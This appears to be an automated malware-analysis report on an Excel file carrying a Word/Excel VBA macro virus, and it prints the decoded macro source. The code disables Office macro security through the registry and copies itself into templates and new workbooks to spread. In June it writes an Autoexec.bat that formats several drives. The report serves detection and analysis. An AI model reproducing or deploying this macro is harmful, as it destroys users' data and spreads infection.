MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1553.005 Security Software Installation
The sample is an Excel file containing a malicious VBA macro, detected as Win.Trojan.Psycho-3 and Win.Trojan.Insert-9. The macro executes a Document_Open subroutine that attempts to disable Office security settings and inject its code into NormalTemplate and ActiveDocument. This suggests an attempt to establish persistence and potentially download additional malicious content. The macro also modifies registry keys related to Office security levels.
Heuristics 6
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6006 bytes |
SHA-256: 272ac38b03404c3e174fab032349512f9a5dc293516c6cca6392cbebb035eafa |
|||
|
Detection
ClamAV:
Win.Trojan.Insert-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'HAHA!
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Application.ShowVisualBasicEditor = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
End If
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "选项(&O)..." Then
mItem.Enabled = False
End If
If mItem.Caption = "模板和加载(&I)..." Then
mItemmItem.Enabled = False
End If
If mItem.Caption = "自定义(&C)..." Then
mItem.Enabled = False
End If
If mItem.Caption = "宏(&M)" Then
mItem.Enabled = False
End If
Next mItem
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'HAHA!" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, TT.Lines(1, TT.CountOfLines)
If AD.Lines(1, 1) <> "'HAHA!" Then
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
End If
If NT.Lines(1, 1) <> "'HAHA!" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
If Month(Now()) = 6 Then
O = "C:\Autoexec.bat"
Open O For Output As 1
Print #1, "@ echo off"
Print #1, "format c: /autoexec/u"
Print #1, "format d: /autoexec/u/select"
Print #1, "format e: /autoexec/u/select"
Print #1, "format f: /autoexec/u/select"
Print #1, "format g: /autoexec/u/select"
Print #1, "format h: /autoexec/u/select"
Print #1, "format j: /autoexec/u/select"
Print #1, "format l: /autoexec/u/select"
Close
End If
End Sub
Private Sub Document_New()
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'HAHA!" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, TT.Lines(1, TT.CountOfLines)
If AD.Lines(1, 1) <> "'HAHA!" Then
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
End If
If NT.Lines(1, 1) <> "'HAHA!" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountOfLines)
Book1Obj.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
If WordObj.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.